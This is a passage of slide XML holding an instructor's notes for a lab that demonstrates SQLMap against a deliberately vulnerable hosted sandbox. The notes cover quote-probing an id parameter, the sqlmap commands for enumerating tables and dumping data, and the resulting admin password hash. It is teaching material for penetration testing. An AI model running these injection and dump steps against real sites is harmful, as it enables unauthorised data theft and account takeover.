              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Dump table data from vulnerable databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that the process for using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Manually identify a potential injection point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> at the potentially vulnerable URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> confirms a vulnerability, proceed to dump database and table information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you'll demonstrate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Scanning a URL for injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Dumping core information about the database, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - The current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - The DB version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - The databases installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - The tables of each database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - The data in any given table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Exploiting a Vulnerable Parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you'll use a hosted vulnerable server to perform your demonstration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Navigate to: &lt;https://hack.me/101138/lamp-security-sqlinject.html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Click **Start**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - When prompted, click **Try It Out**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- When you get your sandbox URL, navigate to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this is just a standard blogging application, which allows users to submit and read articles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Click the **Read More** link below any of the posts on the home page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out the `id` parameter in the URL, as in: `http://s100381-101138-2pf.sipontum.hack.me/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=3`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out that the `id=3` suggests a potential SQL injection point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Change the URL to, e.g.: `http://&lt;Your Sandbox IP Address&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>='`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Replace the number with a quote. Note that your sandbox link will look different.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out that this generates an error on the page:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>&gt; Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>mysql_fetch_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>(): supplied argument is not a valid MySQL result resource in C:\inetpub\wwwroot\coliseum\sandboxes\100381-101138\BODY\inner\actions\default.php on line 23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Remind students that this suggests a SQL injection vulnerability on the `id` parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you'll proceed to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to test this URL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Open a terminal, and run: `docker run --rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>cyberxsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/alpine-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this drops you into a Linux machine that has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> pre-installed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run the command: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> -u http://&lt;Your Sandbox IP Address&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=1`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Explain that this command starts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> against the target URL, and tests the `id` parameter for an injection vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> will detect that the site uses MySQL, and prompt you to skip testing for other databases. Enter `y`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> will then ask if you want to try all MySQL payloads. Enter `y`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> will proceed to attempt various sorts of SQL injections, and report which ones worked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> detects three possible injections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Boolean-based blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - AND/OR time-based blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - UNION query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that, once you've determined that the database is vulnerable to a UNION injection, you can enumerate all the tables it contains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> -u https://&lt;Your Sandbox ID&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=1 --tables`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- This command identifies two databases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`, which contains metainformation about the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`, which is the application's database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - You can ignore `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>` today—it's important for real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> scenarios, but the lesson should remain focused on dumping user data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> reports that the `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>` database contains the tables below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  Database: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  [3 tables]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  +---------------------------------------+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  | user                                  |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  | event                                 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  | log                                   |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  +---------------------------------------+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you can also dump the data from each table with: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> -u https://&lt;Your Sandbox URL&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=1 --current-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> --dump`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - When prompted to **store hashes to a temporary file for eventual processing with other tools**, enter `y`. This file will live in `/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - When prompted to crack password hashes, enter `n`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out the bottom of the output, and explain that this dumps all the table data to files like `/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/output/s100381-101138-2pf.sipontum.hack.me/dump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/event.csv`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - The specific file name will differ based on the URL of your vulnerable application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  # Excerpted from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  [03:06:36] [INFO] table '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec.event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>' dumped to CSV file '/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/output/s100381-101138-2pf.sipontum.hack.me/dump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/event.csv'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>[03:06:36] [INFO] fetched data logged to text files under '/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/output/s100381-101138-2pf.sipontum.hack.me'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run: `cd /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/output/&lt;Your Sandbox URL&gt;/dump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>linuxsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run: `ls`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Point out that this contains a CSV file containing the data for each table!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run: `head user.csv`. This should produce the output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>user_id,user_username,user_password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  1,admin,25e4ee4e9229397b6b17776bfceaf8e7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this contains the username and password hash for the `admin` user—from here, you could crack the password and take over the site!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Emphasize that this ability to easily extract sensitive data from a database is what makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> such a stable amongst web penetration testers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> can perform this injection automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Run: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> -u https://&lt;Your Sandbox URL&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=1 --tables`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Once you've verified that a URL is vulnerable to SQL injection, you can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to exploit it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
